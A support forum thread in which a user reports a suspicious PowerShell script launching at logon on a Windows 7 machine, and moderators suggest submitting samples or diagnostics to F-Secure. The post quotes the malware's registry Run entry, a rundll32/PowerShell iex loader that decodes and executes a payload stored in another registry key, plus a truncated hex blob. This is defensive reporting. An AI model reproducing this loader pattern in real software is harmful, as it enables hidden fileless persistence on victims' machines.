strange power shell script

Scholar

strange power shell script

Dear Support,

today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.

Looking in Run key of the registry i seen this string: 

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

 

Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.

(The byte data is mutch longher)

 

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

 

Could be some king of malware?

2 REPLIES 2
Moderator

Re: strange power shell script

Hi tecnicogsn

 

If you suspect that:
  • A clean file has been falsely detected as malicious, or;
  • A file that is malicious but has not been detected by our software
You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
  1. Select the File Sample tab.
  2. Click Choose File, and attach your sample file.
    • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
    • Note: Subject and description should be written in English.
  3. Verify that you are not a robot with reCAPTCHA.
  4. Click Submit sample file.
The sample submission is analyzed by our analysts and databases, and is updated if necessary.

For more information how you can submit a sample, read our Community article here.
Superuser

Re: strange power shell script

Hello,

 

I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.

 

Best Regards: Tamas Feher, Hungary.